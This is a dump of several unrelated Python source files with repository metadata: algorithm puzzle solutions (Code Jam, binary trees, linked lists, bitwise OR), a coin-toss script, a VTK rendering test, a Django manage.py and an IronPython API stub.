20b1c67b3718d34b8de06cbe25dcb0f54c5ccc12
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
def get_result(R, O, Y, G, B, V):
assert O == 0
assert G == 0
assert V == 0
max_cnt = max(R, Y, B)
if Y + B < max_cnt or R + B < max_cnt or R + Y < max_cnt:
return "IMPOSSIBLE"
cnts = [(R, "R"), (B, "B"), (Y, "Y")]
cnts = sorted(cnts, key=lambda x:x[0], reverse=True)
s = [""] * (3 * max_cnt)
for i in range(cnts[0][0]):
s[3 * i] = cnts[0][1]
for i in range(cnts[1][0]):
s[3 * i + 1] = cnts[1][1]
for i in range(cnts[2][0]):
s[3 * max_cnt - 1 - 3 * i] = cnts[2][1]
return "".join(s)
num_tests = int(input())
for test_id in range(1, num_tests + 1):
N, R, O, Y, G, B, V = map(int, input().strip().split())
res = get_result(R, O, Y, G, B, V)
print("Case #{0}: {1}".format(test_id, res))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
d53dfb47d2536f19b23f7013ea42ec26c225353e
|
3ff660941132bcaed5bfe309861843bd6657ee37
|
/Trees/Print right side.py
|
b8760b5988ef7e07e1d95586be794cfaa5781333
|
[] |
no_license
|
mrunalhirve12/Interviews2
|
04295cebe1946de1f310857d7fbded11a02f8eb1
|
c48bd0a4e1112804da8bdf2d7e43ab0f2ef00469
|
refs/heads/master
| 2023-03-26T14:35:06.029701
| 2021-03-25T21:31:46
| 2021-03-25T21:31:46
| 351,593,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,497
|
py
|
"""
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
Example:
Input: [1,2,3,null,5,null,4]
Output: [1, 3, 4]
Explanation:
1 <---
/ \
2 3 <---
\ \
5 4 <---
"""
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def rightSideView(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
# res list
res = []
# call the dfs function with parameters as root, length of tree and res array
self.dfs(root, 0, res)
# return res
return res
def dfs(self, root, level, res):
# if not root return empty
if not root:
return
# here we only append if the level and res same, so first node (since we call right subtree first) it gets appended
if len(res) == level:
res.append(root.val)
# call the right & left subtree first, increment levels using recursion
self.dfs(root.right, level + 1, res)
self.dfs(root.left, level + 1, res)
# Driver program to test above function
# Let us construct the BST shown in the figure
root = TreeNode(3)
root.left = TreeNode(9)
root.right = TreeNode(20)
root.left.left = TreeNode(15)
s = Solution()
print(s.rightSideView(root))
|
[
"mrunalhirve@gmail.com"
] |
mrunalhirve@gmail.com
|
1bd8bc7fe24bf5d53d09e0a91e38a3bc344e4337
|
77b16dcd465b497c22cf3c096fa5c7d887d9b0c2
|
/Quintana_Jerrod/Assignments/python_fundamentals/coin_tosses.py
|
454a5cb05d4307c7ee2e66f1826a9f9c91709234
|
[
"MIT"
] |
permissive
|
curest0x1021/Python-Django-Web
|
a7cf8a45e0b924ce23791c18f6a6fb3732c36322
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
refs/heads/master
| 2020-04-26T17:14:20.277967
| 2016-10-18T21:54:39
| 2016-10-18T21:54:39
| 173,706,702
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 394
|
py
|
head = 0
tail = 0
import random
for element in range (1, 5001):
toss = round(random.random())
if (toss == 1):
head += 1
toss_text='head'
else:
tail += 1
toss_text = 'tail'
print "Attempt #{}: Throwing a coin... It's a {}! ... Got {} head(s) so far and {} tail(s) so far".format(element,toss_text,head,tail)
print 'Ending the program, thank you!'
|
[
"43941751+curest0x1021@users.noreply.github.com"
] |
43941751+curest0x1021@users.noreply.github.com
|
5d1e945d40520440e25f880459d35743a8ad7393
|
77c518b87e67e9926d130f856a7edb12302596eb
|
/Filters/Core/Testing/Python/MassProperties.py
|
3753d7e93c51cd9108d83665ac7f0756038d055d
|
[
"BSD-3-Clause"
] |
permissive
|
t3dbrida/VTK
|
73e308baa1e779f208421a728a4a15fec5c4f591
|
e944bac3ba12295278dcbfa5d1cd7e71d6457bef
|
refs/heads/master
| 2023-08-31T21:01:58.375533
| 2019-09-23T06:43:00
| 2019-09-23T06:43:00
| 139,547,456
| 2
| 0
|
NOASSERTION
| 2019-11-22T14:46:48
| 2018-07-03T07:49:14
|
C++
|
UTF-8
|
Python
| false
| false
| 4,779
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
=========================================================================
Program: Visualization Toolkit
Module: TestNamedColorsIntegration.py
Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================
'''
import StringIO
import sys
import vtk
import vtk.test.Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class MassProperties(vtk.test.Testing.vtkTest):
def testMassProperties(self):
# Create the RenderWindow, Renderer and both Actors
#
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
cone = vtk.vtkConeSource()
cone.SetResolution(50)
sphere = vtk.vtkSphereSource()
sphere.SetPhiResolution(50)
sphere.SetThetaResolution(50)
cube = vtk.vtkCubeSource()
cube.SetXLength(1)
cube.SetYLength(1)
cube.SetZLength(1)
sphereMapper = vtk.vtkPolyDataMapper()
sphereMapper.SetInputConnection(sphere.GetOutputPort())
sphereActor = vtk.vtkActor()
sphereActor.SetMapper(sphereMapper)
sphereActor.GetProperty().SetDiffuseColor(1, .2, .4)
coneMapper = vtk.vtkPolyDataMapper()
coneMapper.SetInputConnection(cone.GetOutputPort())
coneActor = vtk.vtkActor()
coneActor.SetMapper(coneMapper)
coneActor.GetProperty().SetDiffuseColor(.2, .4, 1)
cubeMapper = vtk.vtkPolyDataMapper()
cubeMapper.SetInputConnection(cube.GetOutputPort())
cubeActor = vtk.vtkActor()
cubeActor.SetMapper(cubeMapper)
cubeActor.GetProperty().SetDiffuseColor(.2, 1, .4)
#Add the actors to the renderer, set the background and size
#
sphereActor.SetPosition(-5, 0, 0)
ren.AddActor(sphereActor)
coneActor.SetPosition(0, 0, 0)
ren.AddActor(coneActor)
coneActor.SetPosition(5, 0, 0)
ren.AddActor(cubeActor)
tf = dict()
mp = dict()
vt = dict()
pdm = dict()
ta = dict()
def MakeText(primitive):
tf.update({primitive: vtk.vtkTriangleFilter()})
tf[primitive].SetInputConnection(primitive.GetOutputPort())
mp.update({primitive: vtk.vtkMassProperties()})
mp[primitive].SetInputConnection(tf[primitive].GetOutputPort())
# here we capture stdout and write it to a variable for processing.
summary = StringIO.StringIO()
# save the original stdout
old_stdout = sys.stdout
sys.stdout = summary
print mp[primitive]
summary = summary.getvalue()
startSum = summary.find(" VolumeX")
endSum = len(summary)
print summary[startSum:]
# Restore stdout
sys.stdout = old_stdout
vt.update({primitive: vtk.vtkVectorText()})
vt[primitive].SetText(summary[startSum:])
pdm.update({primitive: vtk.vtkPolyDataMapper()})
pdm[primitive].SetInputConnection(vt[primitive].GetOutputPort())
ta.update({primitive: vtk.vtkActor()})
ta[primitive].SetMapper(pdm[primitive])
ta[primitive].SetScale(.2, .2, .2)
return ta[primitive]
ren.AddActor(MakeText(sphere))
ren.AddActor(MakeText(cube))
ren.AddActor(MakeText(cone))
ta[sphere].SetPosition(sphereActor.GetPosition())
ta[sphere].AddPosition(-2, -1, 0)
ta[cube].SetPosition(cubeActor.GetPosition())
ta[cube].AddPosition(-2, -1, 0)
ta[cone].SetPosition(coneActor.GetPosition())
ta[cone].AddPosition(-2, -1, 0)
ren.SetBackground(0.1, 0.2, 0.4)
renWin.SetSize(786, 256)
# render the image
#
ren.ResetCamera()
cam1 = ren.GetActiveCamera()
cam1.Dolly(3)
ren.ResetCameraClippingRange()
# render and interact with data
iRen = vtk.vtkRenderWindowInteractor()
iRen.SetRenderWindow(renWin);
renWin.Render()
img_file = "MassProperties.png"
vtk.test.Testing.compareImage(iRen.GetRenderWindow(), vtk.test.Testing.getAbsImagePath(img_file), threshold=25)
vtk.test.Testing.interact()
if __name__ == "__main__":
vtk.test.Testing.main([(MassProperties, 'test')])
|
[
"nikhil.shetty@kitware.com"
] |
nikhil.shetty@kitware.com
|
b589b99088f59ac54b08810c679c36224ffbb831
|
b00b570c551044438c0cc2f10d13458dc06d7613
|
/blog/manage.py
|
04b540c28bb66d56d0fd30fdc4ac7f885faba4a4
|
[] |
no_license
|
shiretree/Blog
|
a938885d84265dfdafb338a4f226f0f52bb1cb10
|
9ed94c4a59468c2dea30c17cfdfe396f3e1e40b9
|
refs/heads/master
| 2020-08-18T18:33:39.991254
| 2019-10-25T15:31:35
| 2019-10-25T15:31:35
| 215,821,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 868
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
profile = os.environ.get('blog_PROFILE','develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "blog.setting.%s" %profile)
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"email"
] |
email
|
237d8804034a2eb54bcae35783ec451375f13cef
|
60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24
|
/IronPythonStubs/release/stubs.min/System/Security/AccessControl_parts/SemaphoreAuditRule.py
|
4209494d452e4bc8c10f25f9e20fabe9f90a6b55
|
[
"MIT"
] |
permissive
|
shnlmn/Rhino-Grasshopper-Scripts
|
a9411098c5d1bbc55feb782def565d535b27b709
|
0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823
|
refs/heads/master
| 2020-04-10T18:59:43.518140
| 2020-04-08T02:49:07
| 2020-04-08T02:49:07
| 161,219,695
| 11
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 772
|
py
|
class SemaphoreAuditRule(AuditRule):
"""
Represents a set of access rights to be audited for a user or group. This class cannot be inherited.
SemaphoreAuditRule(identity: IdentityReference,eventRights: SemaphoreRights,flags: AuditFlags)
"""
@staticmethod
def __new__(self,identity,eventRights,flags):
""" __new__(cls: type,identity: IdentityReference,eventRights: SemaphoreRights,flags: AuditFlags) """
pass
AccessMask=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access mask for this rule.
"""
SemaphoreRights=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access rights affected by the audit rule.
Get: SemaphoreRights(self: SemaphoreAuditRule) -> SemaphoreRights
"""
|
[
"magnetscoil@gmail.com"
] |
magnetscoil@gmail.com
|
bc1dbcc61274452333d727b7e2e93d0812fbc166
|
9222114c0b39007eb1af715cf18fc95ff282b38c
|
/problems/725. Split Linked List in Parts/2 - Hash Table.py
|
297fd75088427c8359ee2f838bbe5019b7190014
|
[] |
no_license
|
Vasilic-Maxim/LeetCode-Problems
|
1a2a09edca6489a349e5d69d087279630cff157d
|
359f3b78da90c41c7e42e5c9e13d49b4fc67fe41
|
refs/heads/master
| 2021-07-10T22:03:29.327658
| 2021-06-07T12:42:52
| 2021-06-07T12:42:52
| 246,826,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 821
|
py
|
from typing import List, Any
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def splitListToParts(self, root: ListNode, k: int) -> List[Any]:
"""
We always pay with time proportional to O(n + k). The worst
case arises when k > n.
Time: O(n + k)
Space: O(n + k)
"""
ids = []
while root is not None:
ids.append(root)
root = root.next
result = [None] * k
div, mod = divmod(len(ids), k)
start = 0
for i in range(k):
if start < len(ids):
result[i] = ids[start]
start += div + (mod > 0)
ids[start - 1].next = None
mod -= 1
return result
|
[
"lmantenl@gmail.com"
] |
lmantenl@gmail.com
|
788645067729b6ef213aed8af530ea537fe1dbbd
|
f90bb6e4a0d47c2c78362e431b47f74395bd42dd
|
/BitwiseORofSubarray.py
|
86117d5012ccf447c11b90a59621899ac47e9c1f
|
[] |
no_license
|
sainihimanshu1999/Dynamic-Programming
|
bc8811d10625af3bc4b81a4eb219b9b84f4e6821
|
65427f049b8b671e2a412497bbb06de8e8497823
|
refs/heads/main
| 2023-04-20T13:53:53.031324
| 2021-05-15T18:03:45
| 2021-05-15T18:03:45
| 365,940,831
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 519
|
py
|
'''
Bitwise or compares each bit of the number and return 1 when one of the bit is one of two numbers.
In this question we are making at list of set of the existing numbers and, then calculating the or
of last number with previous number and then saving the value in a set
'''
def bitWiseOr(self,nums):
table = [set(nums[i]) for i in range(len(nums))]
for i in range(1,len(nums)):
for pre in table[i-1]:
table[i].add(nums[i]|pre)
return len(set.union(*table)) if len(nums)>0 else 0
|
[
"sainihimanshu.1999@gmail.com"
] |
sainihimanshu.1999@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.